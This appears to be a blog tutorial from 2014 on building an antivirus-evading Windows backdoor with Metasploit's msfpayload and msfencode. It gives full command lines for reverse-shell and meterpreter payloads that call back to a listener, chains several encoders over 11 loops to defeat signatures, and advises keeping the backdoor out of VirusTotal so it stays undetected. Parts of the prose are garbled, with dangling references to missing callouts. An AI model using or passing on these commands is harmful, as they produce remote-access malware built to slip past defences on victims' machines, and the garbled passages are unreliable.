UnderTheWIre

 

 

Last  tutorial  we create  a payload  and  exploit a system  and  gained  access  but remember  that we don’t use Antivirus Engine on the target system.  In  real hacking  its  rare to get a target  system  without  having  Antivirus.

 

During the exploitation phase of a pen test or ethical hacking engagement, you will ultimately need to try to cause code to run on target system computers. Whether accomplished by phishing emails, delivering a payload through an exploit, or social engineering, running code on target computers is part of most penetration tests.

 

 

That means that you will need to be able to bypass antivirus software or other host-based protection for successful exploitation. The most effective way to avoid antivirus detection on your target’s computers is to create your own customized backdoor

 

 

 

One of the best ways to avoid being stopped by antivirus software is to encode our payload with msfencode. Msfencode is a useful tool that alters the code in an executable so that it looks different to antivirus software but will still run the same way. Much as the binary attachment in email is encoded in Base64, msfencode encodes the original executable in a new binary. Then, when the executable is run, msfencode decodes the original code into memory and exe-cutes it.

 

 

 

You can use msfencode -h to see a list of msfencode usage options. Of the msfencode options, the encoder formats are among the most important.

 

#msfencode  -h

 

 

s

 

 

 

 

For a list of encoder formats, we use msfencode -l, as shown next. Notice that different encoders are used for different platforms, because, For example, a PowerPC (PPC) encoder will not operate correctly on an x86 platform because of differences in the two architectures.

 

 

#msfencode  -l

 

 

Screenshot from 2014-05-26 15:14:36

 

 

#msfpayload windows/shell_reverse_tcp LHOST=192.168.31.20  LPORT=33334   R    |    msfencode -e x86/shikata_ga_nai    -t   exe   > /home/sathish/setup.exe

 

 

 

Screenshot from 2014-05-26 15:23:21

 

 

We add the R flag at to the msfpayload command line to specify raw output, because we will pipe its output directly into msfencode. We specify the x86/shikata_ga_nai encoder at and tell msfencode to send the executable output -t exe to /home/sathish/setup.exe.

 

 

Finally, we run a quick check at to ensure that the resulting file is in fact a Windows executable. The response tells us that it is. Unfortunately, after the setup.exe file is copied over to the Windows system  or  I used online  malware signature detectors. Almost all  Antivirus  detects our encoded payload.

 

 

Screenshot from 2014-05-26 15:35:17

 

 

 

 

 

When we’re performing antivirus detection without modifying the static binary itself, it’s always a cat-and-mouse game, because antivirus signatures

are frequently updated to detect new and changed payloads. Within the Framework, we can get better results through multi-encoding, which allows

the payload to be encoded several times to throw off antivirus programs that check for signatures.

 

 

In the preceding example, the shikata_ga_nai encoding is polymorphic,meaning that the payload will change each time the script is run. Of course,

the payload that an antivirus product will flag is a mystery: Every time you generate a payload, the same antivirus program can flag it once and miss it another time.

 

 

#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.31.20 LPORT=33334  R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e x86/countdown -c 3 -t exe -o /home/sathish/setup.exe

 

 

 

Screenshot from 2014-05-26 15:45:04

 

 

Here we use 3 counts at of shikata_ga_nai, feeding the code in raw format at into 2 counts of alpha_upper encoding at , which is then fed to another 3 counts of shikata_ga_nai ,followed by 3 counts of countdown encoding at , before finally directing the output into the desired executable. We are using a total of 11 encoding loops in an attempt to circumvent the antivirus software.

 

And again i tested by payload with the Antivirus signatures  in online , we have successfully slipped our payload past the almost all  antivirus engine.

 

 

Screenshot from 2014-05-26 15:52:59

 

 

 

 

One more thing to remember that  you want to use your backdoor for more than one project, do not submit it to virustotal.com or any of the other online sandboxes/scanner that work with antivirus software companies to generate new signatures. Instead, buy a copy of the antivirus product used by your target organization and test it on your own systems  or   alternatively if your target is using one of the nine AV products scanned by VirusNoThanks, you could use http://vscan.novirusthanks.org/   or   http://nodistribute.com/  and be sure to select “Do no distribute the sample” at the bottom of the page.

 

 

I hope you find these techniques useful as you help organizations better understand their security risks and improve their defenses through your penetration testing work!

 

 

Advertisements